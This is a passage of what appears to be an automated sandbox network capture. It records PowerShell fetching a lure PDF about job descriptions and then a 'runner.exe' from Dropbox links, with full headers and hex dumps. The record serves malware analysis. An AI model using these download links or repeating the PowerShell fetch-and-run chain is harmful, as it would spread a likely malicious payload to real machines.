                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:30 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bffba9ede97-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 17 00 04 8e fa 40 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom@C)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  17192.168.2.549775172.64.41.34437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:30 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477bffdbb141b2-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2b 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom+ c)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  18192.168.2.549784162.125.69.154439048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:30 UTC370OUTGET /cd/0/get/CghMt0qCMFbaG-NuPIK8GzgfQMYcjuyFfJKTiOND84sA8tMUGrkGOZ7fi8XSwE-1bqvHAWSNvtWm1SpXZc9BBK5a9N6-SZDpaLzB_DVGOMpLXj9IZZwa8nHuODpLQG-O2MKwkaVMrbo-C1A-sLTOFtY-/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="Documents about company information and job descriptions (4).pdf"; filename*=UTF-8''Documents%20about%20company%20information%20and%20job%20descriptions%20%284%29.pdf
                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  Etag: 1734504831869583d
                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Server-Response-Time: 188
                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:31 GMT
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                  Content-Length: 656088
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 58793107f9fc4683870631690fbdbb99
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC15521INData Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 39 33 0a 2f 4e 20 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 7d 90 bd 4a c3 00 14 85 bf d4 82 28 8a 83 0e 1d 1c 32 38 b8 68 93 a6 69 52 70 69 22 16 d7 56 a1 a9 53 92 a6 41 ec 4f 48 53 f4 01 74 73 70 75 2b 2e be 80 e8 63 28 08 0e e2 e0 23 88 a0 b3 a4 41 52 90 78 e0 c2 c7 e1 c0 bd f7 40 ae 00 90 97 a0 3f 88 c2 46 dd 10 5b 56 5b 9c 7f 47 40 60 2a db 1d 05 64 4b 80 ef 97 24 fb bc f5 4f 2e 4b 0b 1d 6f e4 02 1f 40 14 b6 ac 36 08 1d 60 cd 4f f8 2c 66 27 e1 cb 98 4f a3 20 02 61 12 73 78 d0 30 41 b8 03 36 fd 19 76 66 d8 0d c2 38 ff 06 ec f4 7b 63 37 bd 9b 25 6f 70 d8 04 5a c0 3a 75 86 0c f1 e9 e1
                                                                                                                                                                                                                                                                  Data Ascii: %PDF-1.7%18 0 obj<</Length 293/N 3/Filter /FlateDecode>>streamx}J(28hiRpi"VSAOHStspu+.c(#ARx@?F[V[G@`*dK$O.Ko@6`O,f'O asx0A6vf8{c7%opZ:u
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: 68 92 2e f0 ab 37 a0 22 0a 71 20 88 96 63 31 98 33 b9 2f a6 fa 38 8f 04 3d d4 0b b5 ef 6d e2 5e 95 e3 5d 65 7e ab 25 a3 03 45 0d 7f e8 90 6c 97 39 68 a7 5d f3 dd e0 f8 62 77 23 93 24 36 55 9e 56 52 3e 16 62 ca 11 15 f9 76 5f f4 36 41 41 1b 75 c5 5f 4b f4 4f 92 36 e3 4c 27 4a e4 d7 89 da 24 e2 8b 14 92 13 3b 54 4c a2 3d 9b b4 9b 56 70 94 3b a4 a0 9a 08 ba fa 92 7e 9a 5e fe 84 c6 71 1d 91 0f e6 19 fd 59 f1 36 df 82 1f e2 46 4a be 29 2b 0e 60 bc 93 81 2e 0b 80 9e 3c 57 c4 1c af 36 f6 a5 b3 27 33 a6 1c 38 bd ba 80 5e 5d 30 28 57 28 4b d1 df b8 9a 34 f1 d8 a5 cf b5 e1 32 b6 59 07 e1 ee b0 f4 4c 72 cf 9a c8 4d 0a 5e d6 b7 53 f6 05 40 66 85 fe ff db ff 83 8d 57 dc 4c a4 03 28 e0 c5 af c4 97 55 ea 90 9f 16 67 64 f9 3e 87 a2 0b 33 7e 5b a2 eb 6b 6f 94 6a aa 22 fd
                                                                                                                                                                                                                                                                  Data Ascii: h.7"q c13/8=m^]e~%El9h]bw#$6UVR>bv_6AAu_KO6L'J$;TL=Vp;~^qY6FJ)+`.<W6'38^]0(W(K42YLrM^S@fWL(Ugd>3~[koj"
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC863INData Raw: 2e 47 34 a6 61 d4 78 6c 1e 7d d2 92 e2 ee d2 35 3d 6e fd 95 98 81 b8 7d 4d bc e0 b5 b3 a1 bf 6c ef ed f5 33 b7 7a 2e 9c 8d 67 31 c0 9e 78 ac 6a bc 47 ec e6 dc ce 0d 42 6a db dc 77 a9 3e f7 cd b1 22 e2 24 09 62 ea c0 b7 58 b3 dc d1 32 7b f8 57 8c dd 8b a7 45 0e e3 f1 a7 f1 b9 f6 70 dc f4 43 13 52 5d cd f6 d3 9f 16 94 91 b4 59 49 95 56 08 c4 da 92 9a 4a 76 2c 78 96 f0 e2 37 76 fb 66 b8 0e 9b 92 88 23 7e 7d e3 e0 64 56 b8 0e 8b 92 78 a8 14 ca 0d 3e 88 9c 82 f4 e9 5b ff f3 b4 2e 98 14 c1 44 ab af 8d 37 25 ac 5e e6 83 5a e7 e9 d1 29 61 d4 b0 b5 77 a3 15 67 9e 88 91 bd b2 7b dc 7e 1c 52 3f e1 4e 06 9b 38 9d 13 3e f3 ce e3 ea 5d 53 7a 1a 2f 49 49 51 23 52 2f f2 46 12 41 c5 3c 8c 47 04 fe a2 fa fa 29 a8 40 cf 88 4b 46 42 de f5 8e 62 da 57 df 75 4d 29 78 fa 74 7f
                                                                                                                                                                                                                                                                  Data Ascii: .G4axl}5=n}Ml3z.g1xjGBjw>"$bX2{WEpCR]YIVJv,x7vf#~}dVx>[.D7%^Z)awg{~R?N8>]Sz/IIQ#R/FA<G)@KFBbWuM)xt
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: fb 01 50 e9 9a 72 e3 97 0c 93 97 19 6e 70 d1 4d 63 57 77 39 c7 56 f3 86 4c f8 1b dd 09 3f 90 a0 27 e7 af c6 07 7b 08 86 69 f2 4d 25 e9 3f b8 4b e1 bc 8d 36 c5 df 47 d4 7e b1 2e 21 66 d0 b1 85 5c e4 1f 3f ee d2 7c 71 9c d6 d8 f1 15 eb f9 e6 66 45 3d 92 ee 0e 17 ac bf 34 1f 71 a1 f5 ce cc 2c 2f c3 4b e5 ca f0 53 27 1f 06 aa 92 e6 f2 3a 6d 46 74 fd f6 0a 9a 21 83 48 f2 da 0e 52 7d 43 ce d7 02 c7 5d cd 65 ed df 58 21 24 77 67 4b 8e cd da 87 64 fa c4 5f 4e 56 38 cb 25 f0 29 be 89 f5 75 df f7 c9 55 f6 4b 8d 23 6f 24 b3 6a e5 7f ca e6 26 d6 f1 9e 1b 36 51 92 55 0b 37 94 5c 7a 40 f9 42 fe 95 7b 7a 10 bb df 9d be 27 ce 17 16 18 b5 50 cd 33 4c 11 b8 ac 5a ad 31 f7 f8 6c e5 55 bb 7e 0d ba aa f3 a6 1b ed ea 04 0b 12 cc 8f 5b 67 33 be 1d a3 8c 80 0c c1 76 f4 9f 92 eb
                                                                                                                                                                                                                                                                  Data Ascii: PrnpMcWw9VL?'{iM%?K6G~.!f\?|qfE=4q,/KS':mFt!HR}C]eX!$wgKd_NV8%)uUK#o$j&6QU7\z@B{z'P3LZ1lU~[g3v
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16004INData Raw: 79 f7 75 5c 75 9b d4 5c 90 37 42 10 38 8a 5b 7e 8f 56 ee 54 47 fa f6 e4 e5 37 9d 8e bd b6 9b 77 26 28 26 e8 c3 6a 68 c6 d7 6e 53 e8 89 71 57 c6 39 35 fe cf b0 c8 50 4a e6 74 e9 2e 98 ee 35 ae 80 ef 37 4a 2c a2 05 79 8a fc 99 04 c6 23 c2 ef a6 3a 75 f0 3a c1 4c 05 29 e4 ed 5f af 8d 3d 3d 9f 7a bf 96 dd d4 47 87 a8 4e 30 49 75 d0 20 1c b7 27 a2 37 ae cf f1 e0 24 aa 34 5f 47 8e 67 0d e8 de 0c 93 81 77 13 ee f5 52 51 08 22 b3 fe 65 6f b3 03 ce 85 a4 0f fe 83 79 9a 06 46 b8 2e 8a 84 f8 70 af e4 38 8d 64 19 60 c2 4c 38 d5 16 d8 20 ce 53 d1 45 2d a1 e0 1c af 9c 97 0b 2c 64 31 ce 82 da 5c de 1b 4d af e4 6f 25 e9 e6 52 96 15 da 49 51 68 41 36 3a c5 ac cf 33 0e 12 9d 6d 15 94 64 a6 d0 3f 11 15 88 9b 19 c4 20 98 92 d8 95 6f 04 d6 d2 cb f1 9a e8 5f 5f dc e7 dc ea cd
                                                                                                                                                                                                                                                                  Data Ascii: yu\u\7B8[~VTG7w&(&jhnSqW95PJt.57J,y#:u:L)_==zGN0Iu '7$4_GgwRQ"eoyF.p8d`L8 SE-,d1\Mo%RIQhA6:3md? o__
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: 9d d1 9f 25 d9 9d ec 21 f1 09 10 77 d2 01 f0 09 d1 1c 40 c1 91 a2 08 6d 81 c0 71 12 97 3d 4f 91 f4 14 e6 91 84 f2 a4 0f 1d c6 fc 0e 98 4b 11 d0 6c be 15 04 ad 1f 01 9b 01 eb 31 65 c7 d2 05 48 9b 15 41 30 97 ce 41 07 1b 6c 12 0a 72 5d ce 82 ab 0f a1 78 82 14 fe 55 a7 00 28 48 ad fa 6a 11 3e 6c 02 65 bc 80 56 47 b2 98 5b a6 de 16 e0 42 e4 0c 1a 42 d3 f1 fb 5b e3 10 1e fd f7 a0 b5 40 e1 c3 cc 3e d2 e3 10 2d 8d e1 c3 78 5e b2 26 8c 04 3d a1 96 4f 67 d3 b5 88 eb a0 65 35 82 b9 3f 8d a7 7f be 05 38 26 19 de 44 2b b2 e4 90 fa 2c 4f 98 67 24 42 63 22 50 da a3 3f 68 07 bb 76 05 a0 cc 75 cd d6 92 27 c6 fe 8b e0 96 f9 f4 4b 88 d6 44 72 97 37 34 86 00 d1 f0 5b b9 e3 0b 05 90 9d ba 15 69 cd 7d 81 3e f2 ff ae 18 57 98 1b f4 d1 8f 20 98 af 12 5e e4 dd 06 2d 3c fb cb d0
                                                                                                                                                                                                                                                                  Data Ascii: %!w@mq=OKl1eHA0Alr]xU(Hj>leVG[BB[@>-x^&=Oge5?8&D+,Og$Bc"P?hvu'KDr74[i}>W ^-<
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC16384INData Raw: ce c2 86 fd 27 3d aa 86 2b b7 bc 70 91 7c aa 02 28 f3 33 6e 9a 19 ed 83 6e 88 67 45 b6 ef f1 8e ce c6 75 ff 47 48 cc 69 f5 f1 67 a1 f8 99 3f f5 1c 9e b5 2a 04 7f 88 09 ea 31 fd 95 46 7a 49 72 1a 05 69 6e a8 ae a1 cd 03 5c f5 98 81 a8 cd 2b f0 3f f9 ee cc 4b 2c 7b 78 52 3f aa 7e 32 9b 1f 3f 7e b9 b8 cc 71 d2 07 81 1a 79 9d 08 14 90 36 68 ce 8c 18 e0 f4 a0 4c 10 1c d0 e0 c0 b5 64 26 a0 1f b1 0f cf cb fc d6 73 e0 6a 4b b0 75 73 f2 53 da 2c 0b 59 8e d8 47 ac 1d d2 93 67 a2 77 59 cc 5a 4c 06 46 3f 27 af 84 56 ee 6c 86 2e 1f d7 2a f1 61 22 64 81 97 a3 a1 9a 40 c1 1b cc 1e f3 6b 3e 2a a5 6a 39 0b 39 cc 76 85 0d dd 90 b1 57 50 22 cf 1c 6f 22 9b 5d 84 35 b4 ce bf 2d 88 7d 23 6b fd 0d f8 51 44 88 17 eb 5d ed 3c fd 62 45 c9 f0 b0 d1 86 0f ec 68 c5 43 1a 7c bb 7b 83
                                                                                                                                                                                                                                                                  Data Ascii: '=+p|(3nngEuGHig?*1FzIrin\+?K,{xR?~2?~qy6hLd&sjKusS,YGgwYZLF?'Vl.*a"d@k>*j99vWP"o"]5-}#kQD]<bEhC|{
                                                                                                                                                                                                                                                                  2024-12-19 12:44:31 UTC380INData Raw: 73 9c 6e 61 35 2b 47 e9 38 38 f5 ac 72 9d 36 e1 82 73 76 bc 72 7b ad fe b4 b0 eb c4 71 fc ca 61 d6 4c a7 c3 f4 05 56 7e 36 49 85 98 0e 2f c9 be 0c b2 c6 58 9f 30 b1 46 43 7b f6 73 aa 82 7f 2f c9 8a 00 20 d0 4a f0 c5 13 68 9a 01 d8 56 73 90 b1 02 63 c9 12 c2 04 e3 c5 90 b3 06 51 cf d6 69 1d 61 aa 87 ca 72 d7 c1 5c 0c 1b f3 b9 49 f7 1e 3d 21 f1 ee 39 60 2b 6b da 4b 39 92 1d ee 51 d5 8c 7d 56 4c 20 c1 eb f5 d7 db 69 fe 5f ca c4 d3 59 4b 4d 4e 49 27 8b aa e9 0e b6 ed 01 f3 15 c3 cb e7 77 47 27 e6 14 57 97 67 0b db 8e ce f0 4d 59 e8 3d 07 e5 e8 1c 5a 2f 4e 52 99 2c d5 d2 9e bb f0 e5 6a f1 32 8b a3 64 08 94 ff 26 cf b0 68 2e 01 ac b1 64 55 51 0a 43 59 16 be 10 87 38 9a d9 b2 27 42 f9 ee bd 55 43 5f 6d 58 e7 6b 37 83 d7 1d 36 72 76 fd e4 c4 f9 36 66 e0 62 7e c1
                                                                                                                                                                                                                                                                  Data Ascii: sna5+G88r6svr{qaLV~6I/X0FC{s/ JhVscQiar\I=!9`+kK9Q}VL i_YKMNI'wG'WgMY=Z/NR,j2d&h.dUQCY8'BUC_mXk76rv6fb~
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC16384INData Raw: 8f d8 13 a1 12 95 e0 57 32 b8 17 bc 75 cf 82 5b 28 42 fa 52 c5 ac 5b 23 4d d8 cb 31 ce ca 49 a8 f1 ea b5 5b 9e c6 26 72 df 67 e7 5d d6 df 8e de d1 9f b0 a8 4f 2c 9b 1f a2 37 bf e2 64 a3 73 61 47 7d a2 1e 1a 48 dc 22 34 9b cf 45 5e 24 d9 84 e3 ef b5 eb c3 e6 02 af 9a 7b 07 cf 31 5d 6c 4d 20 dc fb c6 87 d6 6b 5a 68 f6 2f cf fb fa 2b fa be a4 23 6f b4 b6 cd a7 7d fb 15 58 bf cb f5 e5 dc 33 3d f1 e4 db 6f e8 d7 5f ee bb 2a 8a c1 ab d1 3a cf 59 ce ff ac 2e ae f7 b4 ce 73 5b f5 3a 30 f2 9c d3 cf 35 fe 1c 57 13 34 4c 15 c3 68 2b 6e e1 6f e1 56 17 0f 86 c4 68 c5 a1 51 9e fb 4d e5 35 ad f8 15 2f 0e 96 92 65 92 eb 8d b2 ec 47 9b 8e 35 84 25 4d 4c 53 52 99 2c 08 d8 e0 31 72 f6 6c a1 75 5e a1 ff ab 87 69 a1 ce 5f eb 35 f7 a4 fc 50 d7 0d fe 86 77 aa 7a 36 f5 51 77 79
                                                                                                                                                                                                                                                                  Data Ascii: W2u[(BR[#M1I[&rg]O,7dsaG}H"4E^${1]lM kZh/+#o}X3=o_*:Y.s[:05W4Lh+noVhQM5/eG5%MLSR,1rlu^i_5Pwz6Qwy
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC16384INData Raw: ea 78 00 e3 ab 11 42 b5 cc 67 c8 03 e0 d9 c1 8d 6e 9a c0 18 a7 1e 40 2c 98 58 94 15 21 98 5c 84 61 16 4c 5a 01 4e 60 7c db 38 27 09 a4 41 d4 97 07 40 c7 32 ec 30 80 87 93 31 c8 77 81 f5 ae b3 89 ac 46 52 1d 04 0f 50 86 1e 0c 4e ff b6 55 61 45 e4 ca c1 89 80 67 54 8d a0 6b 7b 81 21 6c cf c8 42 82 5e bd 53 93 85 dc 0b 62 da 91 1d 52 8c 7c 7c 40 1e c4 4d 51 8b bd 59 11 22 33 aa a4 15 32 19 f3 4a bd 70 76 23 f5 5a a7 84 74 69 aa 50 44 07 b4 76 e7 a6 09 aa 12 af 67 ed 9a b6 64 34 f9 9d 39 94 04 33 ea 4a 60 2e b1 91 e5 8c 8a fb 20 7e 78 51 8a 03 8a 29 18 8b 5a e1 24 95 7a e3 de 94 97 96 82 df ee 5a 37 3a 6e 8d ae 1b f5 5f 77 ee cd 66 dc e2 56 7a 5c 37 db 30 e0 56 b6 b9 56 80 36 b4 31 60 ea 86 a8 a0 50 af e2 85 19 41 ce 32 da a7 53 95 7c 52 c9 97 03 2a eb 68 a0
                                                                                                                                                                                                                                                                  Data Ascii: xBgn@,X!\aLZN`|8'A@201wFRPNUaEgTk{!lB^SbR||@MQY"32Jpv#ZtiPDvgd493J`. ~xQ)Z$zZ7:n_wfVz\70VV61`PA2S|R*h


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  19192.168.2.549809162.125.69.184439048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:35 UTC212OUTGET /scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                  2024-12-19 12:44:36 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                  Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://ww [TRUNCATED]
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Location: https://uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com/cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgDrrSEyte5G-tVhYFgNTdHl2CFSs9Wh3ng2uo8eQlVPvNYYdJc2HCeE8yuMunb9cYhZzTA-a7IwcEm4yoLOWrZNcdlrkrpNKZmWpGX7Itm3aKjcBJ9qjUwGeoAlcNR/file?dl=1#
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                  Set-Cookie: gvc=NTc4NDU1MzY0Mjk1ODgyNjA3MjE5OTc4Mzc5NTc0NDQ4MDgwNjk=; Path=/; Expires=Tue, 18 Dec 2029 12:44:35 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: t=7at9Db5_QshWY08A3IyvJSaS; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:35 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=7at9Db5_QshWY08A3IyvJSaS; Path=/; Expires=Fri, 19 Dec 2025 12:44:35 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=dqelXKnDLI; Path=/; Expires=Fri, 19 Dec 2025 12:44:35 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:35 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:36 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: c7c73ccd3bed42e38e37d1886d85de44
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:36 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  20192.168.2.549818162.125.69.154439048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
